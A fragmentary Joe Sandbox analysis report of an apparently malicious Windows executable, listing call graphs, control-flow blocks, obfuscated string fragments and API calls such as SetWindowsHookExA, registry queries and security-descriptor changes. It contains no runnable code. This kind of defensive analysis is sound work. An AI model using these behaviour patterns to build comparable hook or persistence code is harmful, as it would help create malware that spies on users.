36 API calls 15062 40ae12 15061->15062 15062->13965 15062->13968 15064 407d30 42 API calls 15063->15064 15063->15068 15065 408c67 15064->15065 15093 407560 15065->15093 15068->15061 15068->15068 15069 408c76 15069->15068 15072 408ccb 15069->15072 15097 408a60 15069->15097 15101 4075c0 15069->15101 15072->15068 15106 4253a6 15072->15106 15114 4253e5 15072->15114 15160 407850 15074->15160 15094 40756c 15093->15094 15096 4075a7 15093->15096 15095 4253a6 50 API calls 15094->15095 15094->15096 15095->15094 15096->15069 15098 408a6d 15097->15098 15122 408180 15098->15122 15103 4075cc 15101->15103 15105 407630 15101->15105 15102 4253a6 50 API calls 15102->15103 15103->15102 15104 4253e5 50 API calls 15103->15104 15103->15105 15104->15103 15105->15069 15107 426f68 __lock 36 API calls 15106->15107 15108 4253ab 15107->15108 15109 4253bb 15108->15109 15110 427a79 ___initmbctable 36 API calls 15108->15110 15111 4253d4 15109->15111 15112 427871 ___initmbctable 50 API calls 15109->15112 15110->15109 15111->15072 15113 4253d0 15112->15113 15113->15072 15115 426f68 __lock 36 API calls 15114->15115 15116 4253ea 15115->15116 15117 4253fa 15116->15117 15118 427a79 ___initmbctable 36 API calls 15116->15118 15119 425410 15117->15119 15120 427871 ___initmbctable 50 API calls 15117->15120 15118->15117 15119->15072 15121 42540c 15120->15121 15121->15072 15129 407b50 15122->15129 15126 408211 15127 424873 _fast_error_exit 36 API calls 15126->15127 15128 40823c 15127->15128 15128->15069 15130 407b85 15129->15130 15131 407b94 15129->15131 15130->15131 15145 402490 15130->15145 15132 407bf5 15131->15132 15152 407a50 15131->15152 15135 405960 15132->15135 15136 405974 15135->15136 15137 424722 42 API calls 15136->15137 15138 405984 15136->15138 15137->15138 15139 4059bf 15138->15139 15140 424762 42 API calls 15138->15140 15141 4059ea 15139->15141 15142 424762 42 API calls 15139->15142 15144 4059fd ___free_lc_time 15139->15144 15140->15139 15143 402250 42 API calls 15141->15143 15141->15144 15142->15141 15143->15144 15144->15126 15146 4024a2 15145->15146 15147 40249d 15145->15147 15149 402250 42 API calls 15146->15149 15151 4024c2 15146->15151 15148 424762 42 API calls 15147->15148 15148->15146 15150 4024b5 15149->15150 15150->15131 15151->15131 15153 407a64 15152->15153 15155 407a69 15152->15155 15154 424762 42 API calls 15153->15154 15154->15155 15156 424762 42 API calls 15155->15156 15157 407a83 15155->15157 15159 407a96 15155->15159 15156->15157 15158 402250 42 API calls 15157->15158 15157->15159 15158->15159 15159->15131 15161 4246fe 42 API calls 15160->15161 15162 407857 15161->15162 15163 407da0 15162->15163 15164 407dcc 15163->15164 15165 407e1d 15163->15165 15166 4028a0 42 API calls 15164->15166 15165->13984 15165->13985 15167 407df1 15166->15167 15173 41e09d 15172->15173 15174 41df4e 15172->15174 15173->13990 15174->15173 15175 41df5a CreateFileA 15174->15175 15248 401000 15185->15248 15230 401b96 15229->15230 15230->15230 16032 4016f0 15230->16032 15232 401bb7 15233 401e69 15232->15233 15234 401bbf GetProcessHeap HeapAlloc 15232->15234 15235 424873 _fast_error_exit 36 API calls 15233->15235 15236 401bda 15234->15236 15247 401bf4 15234->15247 15237 401e77 15235->15237 15238 424873 _fast_error_exit 36 API calls 15236->15238 15240 401beb 15238->15240 15239 401e55 GetProcessHeap HeapFree 15239->15233 15241 401c23 Sleep 15241->15247 15242 401c46 Sleep 15242->15247 15243 401d03 6 API calls 15244 401dda CloseHandle CloseHandle 15243->15244 15245 401e0c DeleteFileA 15243->15245 15246 401830 40 API calls 15244->15246 15245->15247 15246->15247 15247->15239 15247->15241 15247->15242 15247->15243 15249 4010c0 15248->15249 15249->15249 15250 4010d2 ExpandEnvironmentStringsA CreateFileA 15249->15250 15251 401106 15250->15251 15252 40111b CloseHandle 15250->15252 15253 424873 _fast_error_exit 36 API calls 15251->15253 15254 424873 _fast_error_exit 36 API calls 15252->15254 16033 4017b0 16032->16033 16033->16033 16034 4017c2 ExpandEnvironmentStringsA CreateFileA 16033->16034 16035 4017f6 16034->16035 16036 40180b CloseHandle 16034->16036 16037 424873 _fast_error_exit 36 API calls 16035->16037 16038 424873 _fast_error_exit 36 API calls 16036->16038 16039 401804 16037->16039 16040 401823 16038->16040 16039->15232 16040->15232

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 114 4210d0-42123c 115 421240-42125e 114->115 115->115 116 421260-4212f8 115->116 117 421300-421342 116->117 117->117 118 421344-4213e3 117->118 119 4213e5-42141d 118->119 119->119 120 42141f-4214b9 GetProcessHeap HeapAlloc RegOpenKeyExA 119->120 121 4214bb-4214c7 GetLastError 120->121 122 4214c9-4214d3 120->122 123 4214dd-421547 call 41f020 call 41f100 GetProcessHeap HeapFree RegCloseKey call 424873 121->123 122->123
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $#$&$'$($($)$*$0$5$6$8$A$B$F$G$H$I$L$M$N$O$P$S$T$Z$^$`$c$e$f$i$i$l$p$p$q$q$t$v$v$w(B${$~
                                                                  • API String ID: 0-3106658521
                                                                  • Opcode ID: 7ffee0a367cd91da12548a0672ee88ef15d007f6f0e5a8efa2edde75e2af7312
                                                                  • Instruction ID: b9ab1dd3182530b11e39c15e962d93472a180878fd51d4fd0559e01a76d35aec
                                                                  • Opcode Fuzzy Hash: 7ffee0a367cd91da12548a0672ee88ef15d007f6f0e5a8efa2edde75e2af7312
                                                                  • Instruction Fuzzy Hash: 9EE1D32110D7C189D322DB7C945868FBFD05BA7228F581A9DF1E45B3E3C2A98249C76B

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 259 423260-4232bd GetProcessHeap HeapAlloc 260 4232d3-4232e2 HeapAlloc 259->260 261 4232bf-4232d0 call 424873 259->261 263 423306-423318 HeapAlloc 260->263 264 4232e4-423303 HeapFree call 424873 260->264 265 423344-423354 HeapAlloc 263->265 266 42331a-423329 HeapFree 263->266 270 423356-42336c HeapFree * 2 265->270 271 42336e-42337b HeapAlloc 265->271 269 42332a-42332d HeapFree 266->269 273 42332f-423341 call 424873 269->273 270->269 274 42339f-4233ad HeapAlloc 271->274 275 42337d-42339d HeapFree * 3 271->275 277 4233df-423405 InitializeSecurityDescriptor 274->277 278 4233af-4233da HeapFree * 4 274->278 275->269 277->273 280 42340b-423424 GetCurrentProcess OpenProcessToken 277->280 278->269 280->273 281 42342a-423446 GetTokenInformation 280->281 281->273 282 42344c-423466 GetTokenInformation 281->282 282->273 283 42346c-423486 GetTokenInformation 282->283 283->273 284 42348c-423490 283->284 284->273 285 423496-4234a5 SetSecurityDescriptorOwner 284->285 285->273 286 4234ab-4234b3 285->286 286->273 287 4234b9-4234c8 SetSecurityDescriptorGroup 286->287 287->273 288 4234ce-4234f5 AllocateAndInitializeSid 287->288 288->273 289 4234fb-423501 288->289 289->273 290 423507-4235b0 GetLengthSid AddAce 289->290 290->273 291 4235b6-4235f7 AllocateAndInitializeSid 290->291 291->273 292 4235fd-423603 291->292 292->273 293 423609-4236c7 GetLengthSid AddAce 292->293 293->273 294 4236cd-42370c AllocateAndInitializeSid 293->294 294->273 295 423712-423718 294->295 295->273 296 42371e-423793 GetLengthSid AddAce 295->296 296->273 297 423799-4237b6 IsValidSecurityDescriptor 296->297 297->273 298 4237bc-4237da call 424873 297->298
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 0042329F
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000014), ref: 004232B2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00001000,00000000), ref: 004232DC
                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 004232EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Alloc$FreeProcess
                                                                  • String ID:
                                                                  • API String ID: 4128259342-0
                                                                  • Opcode ID: 8f0c75df61baccf555039c07e55f9e7a4c47b3d129244f42066f45807613cd4b
                                                                  • Instruction ID: cabeeef3d48c1ccb1133837745078946395a36f2d94fb2f40b145150ed7ea3f1
                                                                  • Opcode Fuzzy Hash: 8f0c75df61baccf555039c07e55f9e7a4c47b3d129244f42066f45807613cd4b
                                                                  • Instruction Fuzzy Hash: 27F1BC70204354ABD310DF25DC41F6B7BE9EB89700F44492DF984DB290DBB9EA05CB6A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 345 41f660-41f76d 346 41f773-41f785 345->346 346->346 347 41f787-41f794 346->347 348 41f7a7-41f7ac 347->348 349 41f796-41f7a6 call 424873 347->349 351 41f7b4-41f7c7 LoadLibraryA 348->351 352 41f7ae-41f7b2 348->352 354 41f7df-41f7ef call 424873 351->354 355 41f7c9-41f7dd GetProcAddress 351->355 352->351 352->354 355->354 356 41f7f0-41f80a SetWindowsHookExA 355->356 359 41f80c 356->359 360 41f80e-41f824 call 424873 356->360 359->360
                                                                  APIs
                                                                  • LoadLibraryA.KERNELBASE(00000000), ref: 0041F7B9
                                                                  • GetProcAddress.KERNEL32(00000000,00000043), ref: 0041F7CF
                                                                  • SetWindowsHookExA.USER32(00000005,00000000,00000000,00000000), ref: 0041F7FC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHookLibraryLoadProcWindows
                                                                  • String ID: "$'$)$;$A$B$C$E$N$P$P$S$c$h$o$r
                                                                  • API String ID: 2564493370-1035779198
                                                                  • Opcode ID: 00a429360f83fa20652cea882935d05cc92ee5958ea3b9dd59ca4227aa40c6aa
                                                                  • Instruction ID: d6bcc57e59aaaf67e7ff94e30ae49016207e17142ead068d2604868bf6eb43c5
                                                                  • Opcode Fuzzy Hash: 00a429360f83fa20652cea882935d05cc92ee5958ea3b9dd59ca4227aa40c6aa
                                                                  • Instruction Fuzzy Hash: D6514B2520C3C19AD311DB39984478BBFD15FA6318F484AADF0E9873D2D3A9C54AC76B

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 412 425d91-425de3 call 42664c call 4254b0 GetVersionExA 417 425df1-425e0b GetModuleHandleA 412->417 418 425de5-425deb 412->418 419 425e2c-425e2f 417->419 420 425e0d-425e18 417->420 418->417 422 425e58-425e62 call 42846f 419->422 420->419 421 425e1a-425e23 420->421 423 425e44-425e48 421->423 424 425e25-425e2a 421->424 431 425e64-425e6b call 425d6d 422->431 432 425e6c-425e73 call 427120 422->432 423->419 427 425e4a-425e4c 423->427 424->419 426 425e31-425e38 424->426 426->419 429 425e3a-425e42 426->429 430 425e52-425e55 427->430 429->430 430->422 431->432 437 425e75-425e7c call 425d6d 432->437 438 425e7d-425e8c call 42ad49 call 42ab4b 432->438 437->438 445 425e96-425eb2 GetCommandLineA call 42aa29 call 42a987 438->445 446 425e8e-425e95 call 425d48 438->446 453 425eb4-425ebb call 425d48 445->453 454 425ebc-425ec3 call 42a754 445->454 446->445 453->454 459 425ec5-425ecc call 425d48 454->459 460 425ecd-425eda call 4291ea 454->460 459->460 465 425ee3-425efc GetStartupInfoA call 42a6f7 460->465 466 425edc-425ee2 call 425d48 460->466 471 425f04-425f06 465->471 472 425efe-425f02 465->472 466->465 473 425f07-425f1d GetModuleHandleA call 415060 471->473 472->473 476 425f25-425f65 call 429339 call 426687 473->476 477 425f1f-425f20 call 429317 473->477 477->476
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,0042E598,00000060), ref: 00425DB1
                                                                  • GetModuleHandleA.KERNEL32(00000000,?,0042E598,00000060), ref: 00425E04
                                                                  • _fast_error_exit.LIBCMT ref: 00425E66
                                                                  • _fast_error_exit.LIBCMT ref: 00425E77
                                                                  • GetCommandLineA.KERNEL32(?,0042E598,00000060), ref: 00425E96
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00425EEA
                                                                  • __wincmdln.LIBCMT ref: 00425EF0
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00425F0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
                                                                  • String ID:
                                                                  • API String ID: 3897392166-0
                                                                  • Opcode ID: 3b144cdf6a657c3d277f1513a7a37946c3bbd038f07daa96f711f80a89638c8d
                                                                  • Instruction ID: fff0b790c7a0d9b16c0474446a89fef60bd80b9f406c56c5ed212da1009f27c5
                                                                  • Opcode Fuzzy Hash: 3b144cdf6a657c3d277f1513a7a37946c3bbd038f07daa96f711f80a89638c8d
                                                                  • Instruction Fuzzy Hash: 8A41B470B40B30CBDB20AB76FC0566E76A0AF04714FA5443FF9149A291DB7D8942CB9D

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $ $#$#$$$$$%$&$&$&$'$($)$*$/$0$1$2$5$7$8$8$;$=$=$>$?$?$D$H$I$M$M$N$N$N$N$P$P$P$P$P$Q$R$S$S$S$T$T$W$\$]$^$^$^$^c$`$`$a$b$b$c$c$d$d$e$f$g$g$h$h$i$i$i$j$k$m$o$o$p$p$q$r$r$r$r$s$s$s|pd$t$t$u$u$v$v$z$z${${$|$|$|$}$~$~$~
                                                                  • API String ID: 0-2533205990
                                                                  • Opcode ID: e2622106f891706df351979d41e9d59cfc6c36af9e9f3dcf4f33d23ff2114f6b
                                                                  • Instruction ID: 40aa9fcbbacb4e662069c3f6a830727ea6aa88fb999cbe6da6f2476ebe5119cf
                                                                  • Opcode Fuzzy Hash: e2622106f891706df351979d41e9d59cfc6c36af9e9f3dcf4f33d23ff2114f6b
                                                                  • Instruction Fuzzy Hash: D962C32010D7C189D332C77C984879FBFD15BA7228F584A9DE1E85B2E3D2AA8149C767

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00420217
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0042021E
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000006,00000000,00000001,00000000), ref: 0042023E
                                                                  • GetLastError.KERNEL32 ref: 00420248
                                                                  • RegQueryValueExA.ADVAPI32(000000FF,00000000,00000000,00000000,00000000,?), ref: 00420286
                                                                  • GetLastError.KERNEL32 ref: 00420290
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00431CCC,?,00431CCC,?,?,?,?,?,00000001), ref: 004203CA
                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 004203D1
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000001), ref: 004203DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocCloseFreeOpenQueryValue
                                                                  • String ID: $!$$$'$($,$-$0$2$3$4$4$:$:$A$A$C$D$G$H$I$L$S$S$Y$[$\$]$a$b$e$e$g$h$i$m$p$p$q$t$u$v$v$w$y$z${${$|$}$}
                                                                  • API String ID: 1434707997-4021543146
                                                                  • Opcode ID: 29d92220c5e11e6036931e209fc08ce3f9ddb880bb74b97bf96d4e468b4b4558
                                                                  • Instruction ID: 8a31240bc7adcf6ea3cc165c57d100c60a11fb3bc5011af5590440d63b5ba69d
                                                                  • Opcode Fuzzy Hash: 29d92220c5e11e6036931e209fc08ce3f9ddb880bb74b97bf96d4e468b4b4558
                                                                  • Instruction Fuzzy Hash: 6D12072110D7C1CDD332C779984879BBFD55BA7228F485A9DE1E84B2E3C3A98109C76B

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$%$&$'$($/$2$5$=$=$>$?$I$N$N$P$P$Q$R$S$S$T$]$^$^$`$b$c$d$e$g$h$i$i$o$p$r$r$s$t$u$v${$|$}$~
                                                                  • API String ID: 0-2688660894
                                                                  • Opcode ID: 1abc28a2f8c18677790b7c21e6b3aee0d4b5a8bd8af1e207959e33944dc72c7b
                                                                  • Instruction ID: abd944b4bf66b48f6ff19b161d47c379f6673315fd2279abf8dc63a53f241184
                                                                  • Opcode Fuzzy Hash: 1abc28a2f8c18677790b7c21e6b3aee0d4b5a8bd8af1e207959e33944dc72c7b
                                                                  • Instruction Fuzzy Hash: 6EF10A2010D7C18AD332CB789848B9FBFD55BA6314F484AADE1D95B2E3D3B98109C727

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00421857
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0042185E
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,000000A2,00000000,00000001,00000000), ref: 00421878
                                                                  • GetLastError.KERNEL32 ref: 00421888
                                                                  • RegQueryValueExA.ADVAPI32(?,0000000C,00000000,000000F7,00000000,?), ref: 004218A6
                                                                  • GetLastError.KERNEL32 ref: 004218B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$AllocOpenProcessQueryValue
                                                                  • String ID: $"$#$&$)$*$+$0$@$E$E$L$M$N$O$P$P$S$T$W$Z$^$c$d$e$e$i$i$i$j$n$o$r$s$t$t$u$v$v
                                                                  • API String ID: 1776519057-2463442936
                                                                  • Opcode ID: ab6827ab39422699bea6bda1d347a6bd827d59bc8c8f8bf468672a2f9e6538a5
                                                                  • Instruction ID: de080bc917b6dafc203796a283a93a50a3f41381c7ced34f7cef138a8a95d9cd
                                                                  • Opcode Fuzzy Hash: ab6827ab39422699bea6bda1d347a6bd827d59bc8c8f8bf468672a2f9e6538a5
                                                                  • Instruction Fuzzy Hash: D4D13C6110C7C1CDD322D778988879FBFD15BA6218F484E9DF1E45B3E2D2A98109C76B

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
